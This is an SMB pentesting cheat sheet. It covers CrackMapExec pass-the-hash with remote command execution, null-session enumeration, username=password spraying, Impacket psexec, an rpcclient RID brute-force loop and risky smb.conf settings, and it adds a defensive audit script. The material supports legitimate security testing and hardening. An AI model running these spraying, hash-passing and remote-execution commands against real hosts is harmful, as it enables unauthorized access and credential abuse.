SMB

SMB Security & Exploitation Guide

1. About SMB

Server Message Block (SMB) is a client-server protocol that provides shared access to:

  • Files and directories

  • Printers

  • Routers and interfaces

It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.

Default Ports:

  • NetBIOS over TCP: 137, 138, 139

  • Direct SMB (CIFS): 445


2. Tools for SMB Interaction

CrackMapExec (CME)

A powerful tool for SMB enumeration and exploitation.

  • Pass-the-Hash or Command Execution:

    crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami
  • Null-session login and share enumeration:

    crackmapexec smb 203.0.113.5 -u '' -p '' --shares
  • Check a user list against an empty password:

    crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success
  • User=Password spray (each username tried as its own password; --no-bruteforce pairs the lists line by line instead of trying every combination):

    crackmapexec smb 198.51.100.20 -u users.txt -p users.txt -d . --no-bruteforce --continue-on-success

Samba

An open-source implementation of SMB/CIFS on Unix-based systems.

  • Configuration file: /etc/samba/smb.conf

  • Check active connections:

    smbstatus
  • Inspect config (excluding comment lines, which start with # or ;):

    grep -vE '^\s*[#;]' /etc/samba/smb.conf

smbclient

A command-line tool to interact with SMB shares.

  • List available shares (null session):

    smbclient -N -L //192.0.2.10
  • Connect to a share:

    smbclient -U username \\\\192.0.2.10\\share
  • Useful commands:

    • help → show available commands

    • ls → list files

    • get <file> → download a file

    • !<cmd> → run local system command


SMBMap

Automation tool for SMB enumeration and file operations.

  • Basic enum:

    smbmap -H 192.0.2.10
  • Recursive enum:

    smbmap -H 192.0.2.10 -r share
  • Download a file:

    smbmap -H 192.0.2.10 --download "share/example.txt"
  • Upload a file:

    smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"

Impacket Tools

Impacket provides Python scripts for SMB interaction and exploitation.

  • SMB client:

    impacket-smbclient 'rio@corp.local' -no-pass
  • Run SMB server:

    sudo impacket-smbserver share ./ -smb2support
  • Remote code execution:

    impacket-psexec administrator:'mypass@123'@192.0.2.10

    (Same applies for smbexec and atexec.)


RPCclient

rpcclient is the Samba tool for issuing MS-RPC calls over SMB named pipes. RPC (Remote Procedure Call) allows process-to-process communication across systems, and on Windows it exposes user, group and domain information.

  • Connect (null session):

    rpcclient -U "" 192.0.2.10
  • Invoke commands:

    rpcclient $> enumdomusers
    rpcclient $> queryuser <RID>
  • RID Brute Force (users/groups enumeration):

    for i in $(seq 500 1100); do \
    rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \
    | grep "User Name\|user_rid\|group_rid" && echo ""; done

Alternative: use samrdump.py, enum4linux, or enum4linux-ng:

./enum4linux-ng.py 192.0.2.10 -A

Windows Net Command

Establish a null session to the IPC$ share from a Windows host:

net use \\DC01\ipc$ "" /u:""

3. Dangerous SMB Configuration Settings

  • browseable = yes → Shares are visible in network browsing.

  • read only = no → Users can create and modify files.

  • writable = yes → Full write permissions allowed.

  • guest ok = yes → Anonymous logins permitted.

  • enable privileges = yes → Honors user privileges (may be abused).

  • create mask = 0777 → New files created with world read/write permissions.

  • directory mask = 0777 → New directories created with world read/write permissions.

  • logon script = script.sh → Executes script at user login.

  • magic script = script.sh / magic output = script.out → Samba executes the named file on the server as soon as a client closes it, writing its output to the magic output file; this is an auto-execution primitive and should stay unset.
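To check a Samba configuration against the list above, here is an added audit script (not from this page or the Samba project): it parses smb.conf sections, folds Samba's parameter aliases (writeable / write ok / public) onto one canonical name, and reports every explicitly set risky value. The RISKY table, SYNONYMS map and the SAMPLE config are constructed for this example.

```python
# Normalised parameter name -> (value that is risky, or None if risky whenever set; note).
RISKY = {
    "browseable": ("yes", "share advertised in network browsing"),
    "readonly": ("no", "clients can create and modify files"),
    "writable": ("yes", "clients can create and modify files"),
    "guestok": ("yes", "anonymous (guest) logins permitted"),
    "enableprivileges": ("yes", "user privileges honoured; can be abused"),
    "createmask": ("0777", "new files world-readable/writable"),
    "directorymask": ("0777", "new directories world-readable/writable"),
    "logonscript": (None, "script executed at user logon"),
    "magicscript": (None, "file executed on the server when the client closes it"),
}
SYNONYMS = {"writeable": "writable", "writeok": "writable", "public": "guestok"}  # Samba aliases

def parse_smb_conf(text):
    """Return {section: {param: value}}; names lower-cased with whitespace removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # Samba comment lines
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            key = "".join(key.split()).lower()   # "Read Only" -> "readonly"
            sections[current][SYNONYMS.get(key, key)] = value.strip().lower()
    return sections

def audit(text):
    """Return (section, param, value, note) for each explicitly set risky parameter."""
    return [(sec, key, val, RISKY[key][1])
            for sec, params in parse_smb_conf(text).items()
            for key, val in params.items()
            if key in RISKY and RISKY[key][0] in (None, val)]

# Constructed sample config (not from a real server): [public] is wide open.
SAMPLE = """\
[global]
   enable privileges = yes
   ; log level = 1
[public]
   guest ok = yes
   read only = no
   create mask = 0777
[finance]
   writeable = no
"""
```

Only explicitly written lines are checked; Samba defaults such as browseable = yes are not inferred, so compare the findings against the effective configuration printed by testparm -v.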


4. Creating a Share (Windows 10 Example)

  1. Create a folder.

  2. Use Advanced Sharing to share the folder.

  3. Configure both SMB share permissions and NTFS permissions.

    • SMB permissions control network access.

    • NTFS permissions control file system access.

  4. Inherited permissions are marked grey (from parent directory).


5. Mounting SMB Shares (Linux)

sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/

Passing the password on the command line exposes it in the process list and shell history; mount.cifs also accepts a credentials=<file> option that reads username and password from a file readable only by root.
